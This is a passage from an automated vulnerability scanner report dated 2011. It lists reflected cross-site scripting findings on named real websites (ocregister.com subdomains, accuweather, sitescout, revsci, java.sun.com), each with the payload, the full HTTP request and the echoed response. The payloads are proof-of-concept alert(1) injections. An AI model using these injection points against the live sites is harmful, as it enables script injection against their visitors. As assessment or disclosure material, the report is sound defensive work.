Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=7C8A6528759f";alert(1)//240ee4185ab&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.165. http://guru.sitescout.com/tag.jsp [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8e3b'%3balert(1)//7fbf4efe72 was submitted in the w parameter. This input was echoed as d8e3b';alert(1)//7fbf4efe72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=7C8A652&w=300d8e3b'%3balert(1)//7fbf4efe72&h=250&rnd=1219859 HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 383
Date: Thu, 03 Feb 2011 16:04:28 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=7C8A652&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300d8e3b';alert(1)//7fbf4efe72" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.166. http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://huntingtonhomes.ocregister.com
Path:   /2011/02/02/trashed-h-b-house-on-good-morning-america/127042/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d33ef"><script>alert(1)</script>784ccd9e713 was submitted in the REST URL parameter 5. This input was echoed as d33ef\"><script>alert(1)</script>784ccd9e713 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/trashed-h-b-house-on-good-morning-america/127042d33ef"><script>alert(1)</script>784ccd9e713/ HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
nate" type="application/rss+xml" title=" Page not found - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042d33ef\"><script>alert(1)</script>784ccd9e713/feed/" />
...[SNIP]...

1.167. http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://huntingtonhomes.ocregister.com
Path:   /2011/02/02/trashed-h-b-house-on-good-morning-america/127042/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11603"><script>alert(1)</script>ec87b8f4492 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 11603\"><script>alert(1)</script>ec87b8f4492 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/trashed-h-b-house-on-good-morning-america/127042/?11603"><script>alert(1)</script>ec87b8f4492=1 HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Link: <http://huntingtonhomes.ocregister.com/?p=127042>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 130070


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
ashed H.B. house on &#8216;Good Morning America&#8217; - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/?11603\"><script>alert(1)</script>ec87b8f4492=1feed/" />
...[SNIP]...

1.168. http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://huntingtonhomes.ocregister.com
Path:   /2011/02/03/repod-green-home-is-back-on-the-market/127100/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44602"><script>alert(1)</script>cd83832419c was submitted in the REST URL parameter 5. This input was echoed as 44602\"><script>alert(1)</script>cd83832419c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/repod-green-home-is-back-on-the-market/12710044602"><script>alert(1)</script>cd83832419c/ HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
ternate" type="application/rss+xml" title=" Page not found - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/12710044602\"><script>alert(1)</script>cd83832419c/feed/" />
...[SNIP]...

1.169. http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://huntingtonhomes.ocregister.com
Path:   /2011/02/03/repod-green-home-is-back-on-the-market/127100/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aba25"><script>alert(1)</script>01bcc28d4e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aba25\"><script>alert(1)</script>01bcc28d4e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/repod-green-home-is-back-on-the-market/127100/?aba25"><script>alert(1)</script>01bcc28d4e8=1 HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Link: <http://huntingtonhomes.ocregister.com/?p=127100>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77988


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
po&#8217;d &#8216;green&#8217; home is back on the market - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/?aba25\"><script>alert(1)</script>01bcc28d4e8=1feed/" />
...[SNIP]...

1.170. http://hurricane.accuweather.com/hurricane/index.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hurricane.accuweather.com
Path:   /hurricane/index.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 722b7"><script>alert(1)</script>9e1b639a6b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hurricane/index.asp?722b7"><script>alert(1)</script>9e1b639a6b3=1 HTTP/1.1
Host: hurricane.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Type: text/html
Cache-Control: public, max-age=300
Expires: Thu, 03 Feb 2011 19:10:48 GMT
Date: Thu, 03 Feb 2011 19:05:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<a rel="nofollow" href="/hurricane/index.asp?722b7"><script>alert(1)</script>9e1b639a6b3=1&unit=f">
...[SNIP]...

1.171. http://hurricane.accuweather.com/hurricane/index.asp [partner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hurricane.accuweather.com
Path:   /hurricane/index.asp

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81137"><script>alert(1)</script>7e000d53a18 was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hurricane/index.asp?partner=accuweather81137"><script>alert(1)</script>7e000d53a18 HTTP/1.1
Host: hurricane.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Type: text/html
Cache-Control: public, max-age=300
Expires: Thu, 03 Feb 2011 19:10:51 GMT
Date: Thu, 03 Feb 2011 19:05:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<a rel="nofollow" href="/hurricane/index.asp?partner=accuweather81137"><script>alert(1)</script>7e000d53a18&unit=f">
...[SNIP]...

1.172. http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://inyourface.ocregister.com
Path:   /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f25b3"><script>alert(1)</script>e5fb01ad94c was submitted in the REST URL parameter 5. This input was echoed as f25b3\"><script>alert(1)</script>e5fb01ad94c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744f25b3"><script>alert(1)</script>e5fb01ad94c/ HTTP/1.1
Host: inyourface.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://inyourface.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 70357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
k rel="alternate" type="application/rss+xml" title=" Page not found - In Your Face - www.ocregister.com" href="http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744f25b3\"><script>alert(1)</script>e5fb01ad94c/feed/" />
...[SNIP]...

1.173. http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://inyourface.ocregister.com
Path:   /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0f14"><script>alert(1)</script>e4a4ce6c848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0f14\"><script>alert(1)</script>e4a4ce6c848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/?b0f14"><script>alert(1)</script>e4a4ce6c848=1 HTTP/1.1
Host: inyourface.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://inyourface.ocregister.com/xmlrpc.php
Link: <http://inyourface.ocregister.com/?p=25744>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 84939


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
lication/rss+xml" title=" TV bride won more surgery than she knew - In Your Face - www.ocregister.com" href="http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744/?b0f14\"><script>alert(1)</script>e4a4ce6c848=1feed/" />
...[SNIP]...

1.174. http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /update/1.6.0/jinstall-6-windows-i586.cab

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4966c"style%3d"x%3aexpression(alert(1))"f842afe3d26 was submitted in the REST URL parameter 1. This input was echoed as 4966c"style="x:expression(alert(1))"f842afe3d26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /4966c"style%3d"x%3aexpression(alert(1))"f842afe3d26/1.6.0/jinstall-6-windows-i586.cab HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 03 Feb 2011 16:20:10 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>
<!-- BEGIN METADATA -->
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/4966c"style="x:expression(alert(1))"f842afe3d26/1.6.0/jinstall-6-windows-i586.cab
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

1.175. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload da001<script>alert(1)</script>1c47112440a was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G05524da001<script>alert(1)</script>1c47112440a HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=0105974ea67d21e1&F08747&0&4d6e5e16&0&&4d4637e7&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d6e5f77&0&&4d464cb2&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvsNUvMS5jJgE8Efe6cA/gU+BBsKjEeIf8lOISRcnGovHI6UEjSeeH4ygDZPpq3+/yS+PtxMQT7DslgE+EiBMcIdm+Gd/vQ8HMUGpOgSK+Iiy2dQ4mJ3SoQqTJ6fQVFiTZ9oRHyAn8YGRiYSjj2Ay1aQ3fE6vV5I9utDq0gdZ4/kVrRmNIOysji0Wn6/0LxbFbkxJUqn7AWIp2smXVCwMrSCX++R6vBtN664sMTvtNTbZXz0uM3sNWkLQhYlIi7SQwWY0rkMmj7vgY8B8gTBxg4wiG6w5j1DmzvVr4tx5DmkYz2wgpi9jyFX3BxNhVvlXHFNzBu4s3pRGxzkoYSZsG7tdLNgzEqBJPubDyRn4Xf+c3859kMdk7ghrTmCS2c/r6TbGtxpUM45NaHIbEK6+Cm0jFU0ivCzVPvaGdh9z3gjy1aXP5qVqL4CpwQgO4GiR/u5Ro5/TlTA==; rsi_segs_1000000=pUPFeU+FbxIQlVNYvPseIeEiFPKES2rX32SxfaDo4ZtI52+8kOrN2tIEatD2NFDN28McViXNICYwA3URtRQyHBfvW63RgQEvN3nTlHdbuK0MtbbnRNLsfPWlzdt7bBgxNo9S4ekQFKVzWiMHf/qOY/QXNYa+cLbu/9VZ8kRAQYWrhsJ+HLJ+yqOn8V4GEDQj/JldvKgki2EQ3w31l1DXzYDe9FQn0rxNrHq1JcpEh3un35yjZC9pStvAXS+WzCcUrLD4wAtiq9yiIYXVOZ0RybGj2Gcwxe3ACA==; udm_0=MLvv9SEJaSpn5l6pKNOgJzc7zXFB8nFm9ZoBpa581Wgh7Ts5Rm/ap8Mkb9Q+GVTu54epWAGkuIcUzEvjCeu/cWf6M2Y8MG92YDcgNphCc2nnbm6XYDBWZvQrdTfnImZvD//pU9hrkq3bv86KSQiM5G9RudmpysjBB6Uxij3tV7f905NiBwZzxB2kkSvN5YbpKh6ZsFvakr0rEKYNchfYKxs81uUsvWv2v25y/tDzKUbsifk6vQ2nvJ6ImpmA/5NGPJxY5IpXCSIvzhTCDVwuiaID88hEcB3jF4k5YbL0qzpy62M8IhWYAygX0/s33p5EnmiUkFloNtJXzpQogyVM/dhl4Guto+qFj6bc0xOpx/YyjKv2KnCnCmShbqqgnULzYQyjlJqcnzNgKszAnm5AzRgHCwcoF9PxULrFHRjeh0XareOrKfQRqhQLp8ecNZJ7Dca5lClAA7kJRBpe+Va4SqcotI3ftcwzWbF3/RVKyIrzZpgmH5EZSRXp266vDYzzzsgP+MbUOBehZsCRlEuFEWxvlbYtStGrLtpugJtinLSHDY12rxJK5ba2DNcdMvkjX9u03FRxkHRpneE0MEkfCdQqLf3rEbe4LGbnJylb5d6BOhz+I7rfqIKtgMBHyOdoa3He8te+nNg8Le4bqBp7KnAbUABcOudoFrsRKYS+EiiU5zEL/0X6VS47Z58OgKOFKIeyo6shRmEuRscoXQArzUUcxRvOyeagPEQUDGP2Oj+70rit9bjcyjwPsMZaA32N2vxThPC2tH2Pi9XbNK36Vb4VRYuBvHfWhwfmiOlaP6IAr7jnzPBYCinNSy/sPrqi5SfeYBhKre5NLw0dMBum/gLFe/+/EwcENmxjJae/M8L/7ypIk00ObJN7WLFC9H0wncnPMNsre9wng3+O+sMICU5gtuOoO8pn6N5UpDVPTzwhNDJVYLbjnI75a+jexed6Ky9PBS//sjmvosnVlogPhPYuaRy7mKtOd4M45hgsuL5ZFU050Q5QgPUaU+yVbhWpuUOCs8dHz4uEo/8LLwMEFo0u1k3NOWh4k9EDkuGDPBCFimPorFKFp9+lj5thKGyw4nDfh/Z1Lzv27bbMHDhcdW16iaIp7Da617pHmu6/AzI95UtDKEogVjqdkc3arBcYGO8qDEdoGQ2BcMj5JAu8rxQg1tfMSfScdtt/e2yVh7lbt6O1cg38e7wC05yAqNb7SukJxUjILkHITxyR+hvkZT+Lw5WDVFpSb1J5Nt9gPggiXg==; rsi_us_1000000=pUMdIz+j8AcU1C3EwLf6K/JvE2KDo6PfhEUKOic5AFeGN29ElLoI5qcC24O5l693kcybp3YbhLd9/YAOhsul0PE+Dh8nRW7l3xo6Ukv+5EjPSKUdov7vgbyf7cVBVEieI8ERFfZhPhDvpfDIia7KIDnhgVMY7SgWFj6HqsbuM56WGcHsyKE38Hx9Sm98uMWQF9dnsix8gbeSI+UmM20XdmCO1T5iSOGF+xsRE/G92UyZC3yhH8TYizNhEvJkLnAxFid1SqN4xUheUWSK0jPiHSnQ+WbAqNtXP+8cRy1ybSn7Ngk1ueHGim7fNM6foEWqdcCxYS+34Icb+5t0D6Nyg7jf1Sv65zticAkrDmR/cuZFLvFg/BrZC47V6nJNqthhCibZMZWALhXDLhoArpfc6lic7zclFnPskmP/vVJajPkwArw/AXp5inP9j3JWhQI7BsAZ8ykMpbkTLls51/KjwPgTLJlNU/l0jRUNLDIviUTVX0oS9v1OQCiQudLP4sPygpGGPPzJBbzOwBtxUU4YrtFGmwSd4FBfh2mRafVaS9EDgANbe39tHHc3bb98ApWWYQWvxsFpMB5vA6broSows6pOAeuPIXNf5hxAXvPAeJu04VBkn9vjcnpeedu7RUgve8SAFVDZmdgwl5kXG4fO/gf0UpYMar6ZFnRXsUFBWdrSUEh8jCRm4eiegPNbrxrxQqo1l6YrEmxIUGSakuHVzKI6km/o66HsmxCGWo5MYXmdfFkvmrtxCzagDy/fIMMnCvFNp7y1kCisCY2g7FeSMC0GC/ZMWN0R0D0Y+waHlaByglfZv87/DK/SHue/9L0cUBdagNty+3JbLheuS/BXWwk4iJE7MX7vExeH0D97ZxK52F1W2DIRvjzHvDxHVq1BQuHQT+SmPSMqOqsiqN3UfvYr4LoDiIUvQOfxMoDOQ/CFTL1hfAJWYacuqfQjMRwODomdQ2DXeRt83dbSQnBjLtw1hkQDknrycEqNfLg31kDpYvJOwf+SAbMKIdWIJX2S2PV/GcnNjshNHLPZZX0yK2J5vnAynAq4yp7TRMWexhN/Mmvqag1RLzJrNSOGN1bakiS6FSQJpuQLIBGspx+punnrkWal9XSIBusUXP8AEcf1yGM7s2izhk6/6kNVG8BK6BW7VO7G5Wo/CY/q3cTknpX43LcTnWBHfU9Gad1rt++O0gzfTZT88bg4ogjHcKaEN1qOoym6de+Iuj0TrAoU9nX5Pz6kyG/ayesPbEXigte/9jVaNwNL3STj/QzqaTcbXD7mNFD8We0/zA5zoCTvN1kreOzhHEadQemkTTPn7bZ0JVlrjPlvsmLFMj+4CMoSrQ0t0Y2S8A==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 03 Feb 2011 14:22:59 GMT
Cache-Control: max-age=86400, private
Expires: Fri, 04 Feb 2011 14:22:59 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Thu, 03 Feb 2011 14:22:58 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G05524DA001<SCRIPT>ALERT(1)</SCRIPT>1C47112440A" was not recognized.
*/

1.176. http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/14224/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://lagunahomes.ocregister.com
Path:   /2011/02/02/oceanfront-with-killer-views-a-deal/14224/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8adda"><script>alert(1)</script>15e0db13ad7 was submitted in the REST URL parameter 5. This input was echoed as 8adda\"><script>alert(1)</script>15e0db13ad7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/oceanfront-with-killer-views-a-deal/142248adda"><script>alert(1)</script>15e0db13ad7/ HTTP/1.1
Host: lagunahomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://lagunahomes.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
el="alternate" type="application/rss+xml" title=" Page not found - Laguna Beach Homes - www.ocregister.com" href="http://lagunahomes.ocregister.com/2011/02/02/oceanfront-with-killer-views-a-deal/142248adda\"><script>alert(1)</script>15e0db13ad7/feed/" />
